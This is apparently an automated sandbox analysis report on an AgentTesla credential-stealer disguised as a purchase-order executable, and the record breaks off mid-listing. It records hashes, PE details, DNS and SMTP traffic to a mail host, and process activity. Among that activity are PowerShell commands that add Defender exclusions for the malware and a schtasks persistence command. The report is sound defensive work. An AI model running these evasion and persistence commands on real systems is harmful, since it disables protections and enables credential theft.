                                        Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

                                        C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3444
                                        Entropy (8bit):5.011954215267298
                                        Encrypted:false
                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                        MD5:B133A676D139032A27DE3D9619E70091
                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                        Malicious:false
                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                        C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):48786
                                        Entropy (8bit):3.5854495362228453
                                        Encrypted:false
                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                        Malicious:false
                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                        C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3444
                                        Entropy (8bit):5.011954215267298
                                        Encrypted:false
                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                        MD5:B133A676D139032A27DE3D9619E70091
                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                        Malicious:false
                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                        C:\Windows\system32\wbem\Performance\WmiApRpl.ini (copy)

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):48786
                                        Entropy (8bit):3.5854495362228453
                                        Encrypted:false
                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                        Malicious:false
                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.143847466881891
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:purchase order - PO-011024-201.exe
                                        File size:1'000'960 bytes
                                        MD5:62b9604ff6ce5a82d5270041dcd2f3fe
                                        SHA1:880c5ce3bb2f391b8fa2ff5764ed0dc905c3a9e6
                                        SHA256:e3308f1dd36bd61758447d5c6eb6e90adabc65e1119bbbe78537c3e3b622835c
                                        SHA512:d09e5e215457173260fffa63d0313645146214b720eb4917acb642606022eb0148a2486ede2d7272e06db73ad0431aafda1ebc2a15fa36a759afeda1234e852b
                                        SSDEEP:12288:IB+YbtCIcFevvXu7HIlHEHoeCrhISRGOdv1NIbZVBR2Y1xGcCN74sUV2pIPdI7nV:cQ89lF1RGOd9NsXX2hNzUV2G8RQfk9
                                        TLSH:CE2509F4FEE55B3AF1E1AEF33788E5DE512EE2B205165E796B0467012220D504CB7B22
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9................0..(...........F... ...`....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:0b33b32764efb303

                                        Static PE Info

                                        General

                                        Entrypoint:0x4f46a6
                                        Entrypoint Section:.text
                                        Digitally signed:true
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0xA98D3912 [Sat Feb 21 15:58:10 2060 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Authenticode Signature

                                        Signature Valid:
                                        Signature Issuer:
                                        Signature Validation Error:
                                        Error Number:
                                        Not Before, Not After
                                          Subject Chain
                                            Version:
                                            Thumbprint MD5:
                                            Thumbprint SHA-1:
                                            Thumbprint SHA-256:
                                            Serial:

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf46530x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf60000x1994.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xf36000x2820
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf80000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xf1cc80x70.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xf26ac0xf2800039759a1cb42e8aec384640eb17b9178False0.6778612274484536data7.154325575878405IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xf60000x19940x1a001b79d6bb09842533d8c118016aa15417False0.41841947115384615data5.3110445394016965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xf80000xc0x200aa48e7c94b7d06c3d85141b2dad6133eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xf61300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15118 x 15118 px/m0.46318011257035646
                                            RT_GROUP_ICON0xf71d80x14data1.1
                                            RT_VERSION0xf71ec0x5bcdata0.26907356948228883
                                            RT_MANIFEST0xf77a80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 2, 2024 11:47:01.912900925 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:01.912950993 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:01.913021088 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:01.925219059 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:01.925256968 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:02.428308964 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:02.428383112 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:02.431387901 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:02.431404114 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:02.431653976 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:02.471949100 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:02.554505110 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:02.596507072 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:02.667468071 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:02.667542934 CEST44349734172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:02.667680025 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:02.675296068 CEST49734443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:03.327841043 CEST4973625192.168.2.446.175.148.58
                                            Jul 2, 2024 11:47:04.382519960 CEST4973625192.168.2.446.175.148.58
                                            Jul 2, 2024 11:47:06.421648979 CEST4973625192.168.2.446.175.148.58
                                            Jul 2, 2024 11:47:08.612477064 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:08.612524033 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:08.612612009 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:08.616813898 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:08.616830111 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:09.115160942 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:09.115245104 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:09.117206097 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:09.117223024 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:09.117526054 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:09.163788080 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:09.215696096 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:09.256520987 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:09.334240913 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:09.334326029 CEST44349737172.67.74.152192.168.2.4
                                            Jul 2, 2024 11:47:09.334386110 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:09.337656975 CEST49737443192.168.2.4172.67.74.152
                                            Jul 2, 2024 11:47:09.925762892 CEST4973825192.168.2.446.175.148.58
                                            Jul 2, 2024 11:47:10.929411888 CEST4973825192.168.2.446.175.148.58
                                            Jul 2, 2024 11:47:12.944992065 CEST4973825192.168.2.446.175.148.58
                                            Jul 2, 2024 11:47:16.945058107 CEST4973825192.168.2.446.175.148.58
                                            Jul 2, 2024 11:47:24.960661888 CEST4973825192.168.2.446.175.148.58

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 2, 2024 11:47:01.890801907 CEST4928153192.168.2.41.1.1.1
                                            Jul 2, 2024 11:47:01.902121067 CEST53492811.1.1.1192.168.2.4
                                            Jul 2, 2024 11:47:03.309288979 CEST5663453192.168.2.41.1.1.1
                                            Jul 2, 2024 11:47:03.326658010 CEST53566341.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jul 2, 2024 11:47:01.890801907 CEST192.168.2.41.1.1.10x9eeeStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                            Jul 2, 2024 11:47:03.309288979 CEST192.168.2.41.1.1.10x366bStandard query (0)mail.iaa-airferight.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jul 2, 2024 11:47:01.902121067 CEST1.1.1.1192.168.2.40x9eeeNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                            Jul 2, 2024 11:47:01.902121067 CEST1.1.1.1192.168.2.40x9eeeNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                            Jul 2, 2024 11:47:01.902121067 CEST1.1.1.1192.168.2.40x9eeeNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                            Jul 2, 2024 11:47:03.326658010 CEST1.1.1.1192.168.2.40x366bNo error (0)mail.iaa-airferight.com46.175.148.58A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • api.ipify.org

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449734172.67.74.1524438136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-02 09:47:02 UTC155OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                            Host: api.ipify.org
                                            Connection: Keep-Alive
                                            2024-07-02 09:47:02 UTC211INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 09:47:02 GMT
                                            Content-Type: text/plain
                                            Content-Length: 11
                                            Connection: close
                                            Vary: Origin
                                            CF-Cache-Status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 89cdb64d4d675e61-EWR
                                            2024-07-02 09:47:02 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                            Data Ascii: 8.46.123.33


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449737172.67.74.1524437988C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-02 09:47:09 UTC155OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                            Host: api.ipify.org
                                            Connection: Keep-Alive
                                            2024-07-02 09:47:09 UTC211INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 09:47:09 GMT
                                            Content-Type: text/plain
                                            Content-Length: 11
                                            Connection: close
                                            Vary: Origin
                                            CF-Cache-Status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 89cdb676ec6c6a53-EWR
                                            2024-07-02 09:47:09 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                            Data Ascii: 8.46.123.33


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:05:46:53
                                            Start date:02/07/2024
                                            Path:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                                            Imagebase:0xa0000
                                            File size:1'000'960 bytes
                                            MD5 hash:62B9604FF6CE5A82D5270041DCD2F3FE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                                            Imagebase:0xb40000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
                                            Imagebase:0xb40000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
                                            Imagebase:0x940000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:05:46:57
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:05:46:58
                                            Start date:02/07/2024
